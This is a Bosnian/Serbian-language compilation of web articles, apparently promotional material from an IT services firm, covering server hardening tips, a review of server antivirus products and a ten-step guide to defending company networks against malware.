Antivirus proizvodi rade zaštita različitim nivoima. Programi pomažu u sprečavanju problema kao što su:

  • krađu informacija putem daljinskog pristupa server, uključujući i one povjerljive prirode (na primjer, podatke za pristup računima kompanije);
  • uvođenje različitih klijentskih aplikacija u operativni sistem za izvođenje DDoS napada;
  • kvar opreme kompanije zbog štetnog djelovanja različitih programa;
  • blokiranje, oštećenje programa neophodnih za rad i serveri;
  • krađu, falsifikovanje ili uništavanje povjerljivih podataka.

Da rezimiramo, zaključak će biti jedan - implementacija anti-virus baza će pomoći kompaniji da izbjegne velike finansijske gubitke. Štoviše, to se ne odnosi samo na sprječavanje mogućeg hakovanja serveri, ali i za očuvanje funkcionalnosti opreme i plaćenih online sistema. Zato je pitanje postavke kvalitetno i efikasno zaštita uvijek relevantan za kompanije svih veličina.

Najpopularniji softver za instalacije u kancelariji

Najčešće kupci preferiraju postavljanje različite verzije antivirusa Kaspersky. Popularnost ovog softverskog proizvoda je zbog sljedećih karakteristika:

  • veliki broj opcija za mala, srednja i velika preduzeća, zasebna linija za kućnu upotrebu;
  • softverski kompleksi Kaspersky dizajniran za instalacija ne samo u uredu serveri, ali i na mobilni telefoni, laptop;
  • serveri saradnja, pošta, razni fajlovi su sigurno zaštićeni antivirusno proizvod
  • antivirus Kaspersky suprotstavlja se napadima na Internet pristupnike;
  • postavljanje proizvod eliminiše unutrašnju opasnost od napada serveri, jer podrazumijeva diferencijaciju korisničkih prava.

Između ostalih pogodnosti instalacije navedenog antivirusnog sistema - sigurnosna kopija podataka, pohrana lozinki i automatsko popunjavanje internetskih obrazaca u sigurnom načinu rada, onemogućavanje pristupa serveri spam, phishing. Osim toga, cijena zaštita ovi proizvodi su veoma korisni. Za korisnike koji su malo upućeni u zamršenosti programiranja, antivirusni programeri Kaspersky kreirao zgodan, jednostavan i intuitivan interfejs.

Na šta treba obratiti pažnju pri odabiru sigurnosnog softvera?

  • zaštititi šta serveri izračunava se specifični softver: dom, mala i srednja preduzeća, velika preduzeća;
  • širina obuhvata predloženih programa lokalnih serveri posao;
  • kontinuitet rada, učestalost i uslovi ažuriranja;
  • mogućnost centralizovanog upravljanja antivirusnim sistemom;
  • kompatibilnost predloženog proizvoda sa instaliranim poslovnim programima i drugim softverom.

Važna stvar je i izbor kompanije koja implementira takve proizvode. Kvalificirani zaposlenik će u najkraćem mogućem roku postaviti ispravan rad i uputiti klijente kako da koriste programske alate pri radu sa serveri. Troškovi pružanja ovakvih usluga igraju važnu ulogu - u našoj kompaniji to je uvijek vrlo isplativo.

Nemoguće je jednom zauvijek zaštititi server od vanjskog pristupa, jer se svakodnevno otkrivaju nove ranjivosti i pojavljuju novi načini hakovanja servera. U ovom članku ćemo govoriti o zaštiti servera od neovlaštenog pristupa.

Serveri bilo koje kompanije mogu prije ili kasnije postati meta hakovanja ili virusnog napada. Tipično, rezultat takvog napada je gubitak podataka, reputacija ili finansijska šteta, tako da se na prvom mjestu treba pozabaviti sigurnosnim problemima servera.

Treba shvatiti da je zaštita od hakovanja servera skup mjera, uključujući i one koje podrazumijevaju stalno praćenje rada servera i rad na poboljšanju zaštite. Nemoguće je jednom zauvijek zaštititi server od vanjskog pristupa, jer se svakodnevno otkrivaju nove ranjivosti i pojavljuju novi načini hakovanja servera.

U ovom članku ćemo govoriti o zaštiti servera od neovlaštenog pristupa.

Načini i metode zaštite servera od neovlaštenog pristupa

Fizička zaštita servera

Fizička zaštita. Poželjno je da server bude smješten u sigurnom data centru, zatvorenoj i čuvanoj prostoriji, autsajderi ne bi trebali imati pristup serveru.

Postavite SSH autentifikaciju

Kada postavljate pristup serveru, koristite autentifikaciju SSH ključem umjesto lozinke, jer je takve ključeve mnogo teže, a ponekad jednostavno nemoguće provaliti brute-force pretragom.

Ako mislite da vam je i dalje potrebna lozinka, svakako ograničite broj pokušaja da je unesete.

Obratite pažnju ako vidite ovakvu poruku kada se prijavite:

Posljednja neuspješna prijava: Tue Sep 28 12:42:35 MSK 2017 od 52.15.194.10 na ssh:notty
Bilo je 8243 neuspjelih pokušaja prijave od posljednje uspješne prijave.

To može značiti da je vaš server hakovan. U tom slučaju, da biste konfigurisali bezbednost servera, promenite SSH port, ograničite listu IP adresa sa kojih je moguć pristup serveru ili instalirajte softver koji automatski blokira preterano česte i sumnjive aktivnosti.

Redovno instalirajte najnovija ažuriranja

Kako biste osigurali zaštitu servera, na vrijeme instalirajte najnovije zakrpe i ažuriranja serverskog softvera koji koristite - operativni sistem, hipervizor, server baze podataka.

Preporučljivo je svaki dan provjeravati nove zakrpe, ažuriranja i prijavljene greške/ranjivosti kako biste spriječili napade koji iskorištavaju ranjivosti nultog dana. Da biste to učinili, pretplatite se na vijesti kompanije za razvoj softvera, pratite njene stranice na društvenim mrežama.

Zaštitite lozinke

Daleko jedan od najčešćih načina da se dobije pristup serveru je probijanje lozinke servera. Stoga, slijedite poznate, ali ipak relevantne preporuke kako ne biste ostavili server nezaštićenim:

  • ne koristite lozinke koje je lako pogoditi, kao što je naziv kompanije;
  • ako još uvijek koristite zadanu lozinku za administratorsku konzolu, odmah je promijenite;
  • lozinke za različite usluge moraju biti različite;
  • ako trebate podijeliti svoju lozinku s nekim, nikada nemojte slati svoju IP adresu, korisničko ime i lozinku u istoj poruci e-pošte ili messenger-a;
  • Možete postaviti verifikaciju u 2 koraka da biste se prijavili na administratorski račun.

firewall

  • Uvjerite se da server ima , je li konfiguriran i da radi cijelo vrijeme.
  • Zaštitite i dolazni i odlazni saobraćaj.
  • Pratite koji su portovi otvoreni i za koju svrhu, ne otvarajte ništa nepotrebno kako biste smanjili broj mogućih ranjivosti za hakovanje servera.

Posebno, zaštitni zid je od velike pomoći u zaštiti servera od ddos ​​napada, jer možete brzo kreirati pravila zaštitnog zida za blokiranje i dodati IP adrese sa kojih dolazi napad ili blokirati pristup određenim aplikacijama koristeći određene protokole.

Monitoring i otkrivanje upada

  • Ograničite softver i usluge koje rade na vašem serveru. Povremeno provjeravajte sve što ste pokrenuli, a ako se pronađu nepoznati procesi, odmah ih obrišite i počnite provjeravati viruse.
  • Povremeno provjeravajte znakove neovlaštenog pristupa. Hak se može dokazati novim korisničkim nalozima koje niste kreirali, premjestili ili izbrisali datoteku /etc/syslog.conf, obrisane datoteke /etc/shadow I /etc/passwrd .
  • Pratite svoj server, pazite na njegovu normalnu brzinu i propusnost, tako da možete primijetiti odstupanja, na primjer, kada je opterećenje na serveru postalo mnogo veće nego inače.

Korištenje VPN i SSL/TLS enkripcije

Ako je potreban daljinski pristup serveru, on mora biti dozvoljen samo sa određenih IP adresa i odvijati se preko VPN-a.

Sljedeći korak u osiguranju sigurnosti može biti postavljanje SSL-a, koji ne samo da će šifrirati podatke, već i provjeravati identitet ostalih sudionika u mrežnoj infrastrukturi izdavanjem odgovarajućih certifikata.

Sigurnosna provjera servera

Bilo bi dobro da samostalno provjerite sigurnost servera metodom pentest, tj. simulacija napada za pronalaženje potencijalnih ranjivosti i njihovo uklanjanje na vrijeme. Preporučljivo je u to uključiti stručnjake sigurnost informacija, međutim, neki testovi se mogu obaviti nezavisno koristeći programe za hakovanje servera.

Šta još prijeti serverima osim hakovanja

Server se može pokvariti iz više razloga osim hakiranja. Na primjer, to može biti infekcija zlonamjernim softverom ili samo fizički kvar jedne od komponenti.

Stoga mjere za zaštitu servera trebaju uključivati:

  • Instaliranje i ažuriranje programa za zaštitu servera - antivirusa.
  • Redovne šifrovane kopije podataka najmanje jednom sedmično, jer su, prema statistikama, serverski hard diskovi na prvom mjestu po učestalosti kvarova. Provjerite je li sigurnosna kopija pohranjena u fizički sigurnom okruženju.
  • Osiguravanje neprekidnog napajanja serverske sobe.
  • Pravovremena fizička prevencija servera, uključujući čišćenje od prašine i zamjenu termalne paste.

Iskustvo stručnjaka Integrusa govori nam da je najbolja zaštita od ovakvih pretnji primena najbolje prakse u oblasti sistema zaštite servera.

Kako bismo osigurali sigurnost servera naših klijenata, koristimo kombinaciju alata: firewall-a, antivirusa, tehnologije sigurnosti/upravljanja događajima (SIM/SEM), tehnologije detekcije upada/zaštite (IDS/IPS), tehnologije analize ponašanja mreže (NBA) , naravno redovno preventivno održavanje servera i uređenje sigurnih server soba po sistemu ključ u ruke. Ovo vam omogućava da smanjite rizike od hakovanja ili kvara servera iz drugih razloga.

Spremni smo da izvršimo bezbednosnu reviziju servera Vaše kompanije, konsultujemo specijaliste, izvršimo sve vrste radova na postavljanju zaštite serverske opreme.

Server je specijalizovani računar čije se radnje odvijaju bez aktivnog učešća korisnika. Obično postoji usluga softver za obavljanje određenih zadataka. Preko takvog kompjutera se razmjenjuju podaci, pokreću akcije, izvode matematički proračuni i još mnogo toga. Svi serveri se razlikuju po vrstama, na primjer, postoje gaming, web, mail i proxy serveri. Svaki takav uređaj obavlja jasno definisan zadatak. Često se za siguran rad takve mašine na njoj instalira antivirus, pa bismo vam željeli reći nešto više o takvom softveru, ističući nekoliko specifičnih rješenja.

Platforma: Windows Server

Poznata antivirusna kompanija Avast objavljuje sklop posebno za servere, pružajući dodatne korisne alate. Na primjer, pogledajte funkciju "Uništavanje podataka". Implementiran je na način da prepisuje nasumično generirane informacije u svim izbrisanim podacima, što neće omogućiti ponovno kreiranje originalnog stanja datoteke prilikom pokušaja vraćanja. Osim toga, postoji "Analiza ponašanja"- alat odgovoran za skeniranje radnih aplikacija za sumnjive aktivnosti. Ako notepad pokuša pristupiti istoj web kameri, takav zahtjev će biti odmah blokiran. Naravno, takav primjer je jednostavan, ali funkcija radi na višem nivou.

Avast Business Antivirus Pro takođe ima ugrađeni zaštitni zid, pametno skeniranje, zaštitu od neželjene pošte, zaštitu lozinkom i lakšu prijavu na nalog. Takođe se vrši stalna poređenje verovatnih pretnji sa trenutnom bazom virusa korišćenjem softverske tehnologije zaštitnika. Omogućit će vam interakciju samo s provjerenim podacima. Zauzvrat, CyberCapture alat će poslati sumnjive objekte u Threat Lab.

Avira Antivirus Server

Platforma: Windows Server

Avira Antivirus Server je specijalno rješenje razvojne kompanije za servere koji koriste Windows operativni sistem. Kreatori obećavaju maksimum efikasan rad uz nisku potrošnju sistemskih resursa, visoku stopu otkrivanja prijetnji i jednostavnost korištenja. Sklop ima dodane alate za zaštitu pri pristupu, odnosno nadgleda pokrenute procese kada im pristupaju druge aplikacije. Tu je i ručno skeniranje, koje vam omogućava da u bilo kojem trenutku započnete analizu navedenog medija ili zasebnog direktorija.

Još jednom napominjemo da programer stavlja poseban naglasak na nisku potrošnju PC resursa i jednostavnost upravljanja antivirusom. Obećane su i stalne besplatne inovacije i ažuriranja baze virusa. Ukoliko ste zainteresovani da se upoznate sa ovim proizvodom, možete dobiti besplatnu verziju za period od 30 dana na zvaničnom sajtu popunjavanjem odgovarajućeg obrasca. Tokom testiranja bit će dostupni svi alati i funkcije, kao i besplatan kontakt sa službom podrške.

ESET File Security

ESET File Security je dizajniran za rad na Windows i Linux serverima i pruža višeslojnu zaštitu zahvaljujući dodatnoj ESET Dynamic Threat Defense komponenti u oblaku. Sistem zaštite zasnovan na oblaku automatski štiti od novih pretnji bez čekanja na ažuriranje mašine za detekciju (navedeno prosečno vreme ažuriranja je 20 minuta). Ugrađena zaštita od mrežnih napada prepoznaje poznate ranjivosti na nivou mreže, a kada koristite OneDrive, Office 365 OneDrive Storage motor će ga skenirati. Takođe treba obratiti pažnju na sprečavanje uticaja botneta. Alat ne samo da pronalazi zlonamjernu vezu, već i otkriva iste procese, odmah blokira opasnu aktivnost i obavještava korisnika o tome.

Za upravljanje programom ESET File Security, od korisnika se traži da instalira konzolu na Windows ili Linux, a postoji i virtuelni uređaj za uvoz kako bi se pojednostavilo podešavanje. Možete se upoznati sa svim funkcijama ovog antivirusa, isprobati njegovu besplatnu verziju i kupiti cijelu na službenoj web stranici programera.

kaspersky security

Platforma: Windows Server, Linux

Kaspersky Security za servere je uključen u sklopove - Total, Endpoint Security for Business, Kaspersky Security za virtuelna i Cloud okruženja i Kaspersky Security za sisteme za skladištenje podataka. Kupovinom jedne od ovih verzija dobijate pouzdanu zaštitu za vaš server najnovija generacija malware. Predmetni softver ima naprednu zaštitu servera i pruža zaštitu od eksploatacije, zaštitu terminalnih servera, prati eksterni saobraćaj, integritet sistema i kontinuirano štiti sisteme za skladištenje podataka koristeći alat na više nivoa. Ugrađeni sistemi za upravljanje pravima administratora omogućavaju jednostavno upravljanje, obavještenja, kao i integraciju sa SIEM sistemima i upravljanje Windows zaštitnim zidom.

Želeo bih da primetim da Kaspersky Security ima odvojeno Zahtjevi sustava za specifične platforme za skladištenje, na primjer, za NetApp - Clustered Data ONTAP 8.x i 9.x i Data ONTAP 7.x i 8.x u 7-mode modu, i za EMC Isilon - IBM System Storage N serija. Možete se upoznati sa listom svih zahtjeva prilikom preuzimanja antivirusa na Kaspersky web stranici.

McAfee VirusScan Enterprise

Platforma: Windows Server, Linux

Ranije su korisnici instalirali McAfee Endpoint Security na svoje servere, ali su programeri odlučili poboljšati ovaj proizvod daljom promjenom njegovog imena. Sada je to VirusScan Enterprise. Svima koji su ranije koristili ovaj antivirus nudi se besplatna migracija. Službena web stranica pruža sve potrebne upute i lekcije o ovom pitanju. na osnovni alat nova verzija uključuje: firewall, web kontrole za komunikaciju prijetnji, obavezni antivirus i opcije za sprječavanje eksploatacije.

McAfee VirusScan Enterprise koristi i savremenim metodama mašinsko učenje. Takve tehnologije omogućavaju otkrivanje zlonamjernog koda putem statičkih i bihevioralnih atributa. Zlonamjerni softver se zadržava čim uđe u sistem, sprječavajući ga da inficira druge procese. Tehnologija Endpoint Detection i Tesponse odgovorna je za otkrivanje i odgovor krajnje tačke - to će vam omogućiti da odgovorite na prijetnje jednim klikom.

Comodo Antivirus za Linux

Platforma: Linux

Programeri Comodo Antivirusa predstavili su posebnu verziju za operativne sisteme bazirane na Linux kernelu. Ovaj program podržava većina distribucija, kako 32-bitnih tako i 64-bitnih.Od karakteristika bih odmah izdvojio filter pošte, koji je kompatibilan sa popularnim mail agentima: Postfix, Qmail, Sendmail i Exim MTA. Proizvođač garantuje pouzdanu zaštitu u realnom vremenu, jednostavnu instalaciju i bez kompliciranih koraka konfiguracije. Sistem zaštite od neželjene pošte može se u potpunosti uređivati ​​ručno, ali će to omogućiti standardne postavke dobra filtracija. Ako korisnik želi dobiti još veću kontrolu nad datotekama, dostupna je funkcija za omogućavanje "Analiza ponašanja u realnom vremenu". Svi sumnjivi objekti će biti poslani serveru za analizu ponašanja u oblaku.

Za udobno korištenje Comodo Antivirusa trebat će vam računar velike snage sa minimalnom frekvencijom procesora od 2 GHz i 2 GB slobodne RAM-a. Ne morate da brinete o pokretanju skeniranja: biće dovoljno da konfigurišete njihov plan samo jednom, a u budućnosti će se automatski pokrenuti. Analizu je moguće pokrenuti u bilo kojem pogodnom trenutku pritiskom na samo jedno dugme. Predmetni antivirus je otvorenog koda, distribuira se besplatno i preuzima sa službene web stranice.

Chkrootkit

Platforma: Linux

Chkrootkit (Check Rootkit) je program koji sistemski administratori naširoko koriste za zaštitu operativnog sistema od poznatih rootkita. Rutkit je skup komponenti, kao što su skripte, izvršne ili konfiguracijske datoteke, koje obavljaju funkciju maskiranja, kontrole i prikupljanja podataka. Uz pomoć takvih alata, napadači prodiru u OS i dobijaju sve potrebne informacije. Gore navedeni softver je samo dizajniran da zaštiti računar od ove vrste aktivnosti. Chkrootkit ne zahtijeva instalaciju i može se pokrenuti sa Live CD-a. Rad u njemu obavlja se putem bilo koje prikladne konzole, a upravljanje je jasno čak i neiskusnom korisniku.

Chkrootkit radi prilično brzo, dobro radi svoj posao, ne zauzima puno prostora na disku, ali u isto vrijeme sadrži ogroman broj modula za svaki tip korisnika. Na službenoj web stranici postoje sklopovi programa u različitim ekstenzijama, a preuzimanje je dostupno iz direktnog izvora ili nekoliko ogledala.

Upoznali ste se sa antivirusnim rješenjima koja će postati najbolje rješenje Za razne vrste serveri. Kao što vidite, svaki softver ima svoje karakteristike, tako da će biti najkorisniji u određenim situacijama.

Kako pravilno organizirati odbranu kompjuterskih mreža od zlonamjernog softvera.

Članak je namijenjen početnicima administratorima sistema.

Pod antivirusnom zaštitom mislim na zaštitu od bilo koje vrste zlonamjernog softvera: virusa, trojanaca, root kitova, backdoor-a,…

1 Korak antivirusne zaštite - instalirajte antivirusni softver na svaki računar u mreži i ažurirajte ga barem dnevno. Ispravna shema ažuriranja antivirusnih baza podataka: 1-2 servera idu na ažuriranja i distribuiraju ažuriranja svim računarima u mreži. Obavezno postavite lozinku da biste onemogućili zaštitu.

Antivirusni softver ima mnogo nedostataka. Glavni nedostatak je što ne hvataju viruse napisane po narudžbi i koji se ne koriste široko. Drugi nedostatak je što opterećuju procesor i zauzimaju memoriju na računarima, neki više (Kaspersky), neki manje (Eset Nod32), to se mora uzeti u obzir.

Instaliranje antivirusnog softvera je obavezan, ali nedovoljan način zaštite od izbijanja virusa, često se virusni potpis pojavljuje u antivirusnim bazama sljedeći dan nakon distribucije, a virus za 1 dan može paralizirati rad bilo koje računalne mreže.

Obično se administratori sistema zaustavljaju na koraku 1, što je još gore, ne dovrše ga ili ne prate ažuriranja, a prije ili kasnije infekcija se ipak dogodi. U nastavku ću navesti druge važne korake za jačanje antivirusne zaštite.

Korak 2 Politika lozinke. Virusi (trojanci) mogu zaraziti računare na mreži pogađanjem lozinki za standardne naloge: root, admin, administrator, administrator. Uvijek koristite složene lozinke! Za naloge bez lozinki ili sa jednostavnim lozinkama, administrator sistema treba da bude otpušten sa odgovarajućim unosom u radnoj knjižici. Nakon 10 pokušaja unosa pogrešne lozinke, nalog bi trebalo blokirati na 5 minuta radi zaštite od grube sile (pogađanje lozinke jednostavnim nabrajanjem). Toplo se preporučuje da se ugrađeni administratorski nalozi preimenuju i onemoguće. Lozinke je potrebno periodično mijenjati.

3 Korak. Ograničenje prava korisnika. Virus (trojanac) se širi mrežom u ime korisnika koji ga je pokrenuo. Ako su prava korisnika ograničena: nema pristupa drugim računarima, nema administrativnih prava na njegovom računaru, onda čak ni pokrenuti virus neće moći ništa da zarazi. Nije neuobičajeno da sami administratori sistema postanu krivci za širenje virusa: pokrenuli su admin key-gen i virus je zarazio sve računare na mreži...

4 Korak. Redovna instalacija sigurnosnih ažuriranja. To je težak posao, ali mora da se uradi. Morate ažurirati ne samo OS, već i sve aplikacije: DBMS, mail servere.

Korak 5 Ograničenje načina prodiranja virusa. Virusi ulaze u lokalnu mrežu preduzeća na dva načina: preko prenosivih medija i preko drugih mreža (Internet). Uskraćivanjem pristupa USB-u, CD-DVD-u, potpuno blokirate 1 način. Ograničavanjem pristupa Internetu blokirate 2. put. Ova metoda je vrlo efikasna, ali je teška za implementaciju.

6 Korak. Zaštitni zidovi (ITU), oni su takođe zaštitni zidovi (firewall), oni su takođe zaštitni zidovi. Moraju se instalirati na granicama mreže. Ako je vaš računar direktno povezan na Internet, ITU mora biti omogućen. Ako je računar povezan samo na lokalnu mrežu (LAN) i pristupa Internetu i drugim mrežama preko servera, onda nije potrebno omogućiti ITU na ovom računaru.

Korak 7 Podjela poslovne mreže na podmreže. Pogodno je razbiti mrežu prema principu: jedno odjeljenje u jednoj podmreži, drugo odjeljenje u drugoj. Podmreže se mogu podijeliti na fizičkom sloju (SCS), na sloju veze podataka (VLAN), na mrežnom sloju (podmreže koje nisu ispresijecane IP adresama).

Korak 8 Windows ima divan alat za upravljanje bezbednošću velikih grupa računara - to su grupne politike (GPO). Putem GPO-a možete konfigurirati računare i servere tako da infekcija i distribucija zlonamjernog softvera postanu gotovo nemogući.

Korak 9 Pristup terminalu. Podignite 1-2 terminalska servera na mreži preko kojih će korisnici pristupati Internetu i vjerovatnoća zaraze njihovih personalnih računara će pasti na nulu.

Korak 10 Praćenje svih procesa i usluga koje rade na računarima i serverima. Možete napraviti tako da kada se pokrene nepoznati proces (usluga), administrator sistema bude obaviješten. Komercijalni softver koji to može dosta košta, ali u nekim slučajevima su troškovi opravdani.

Gore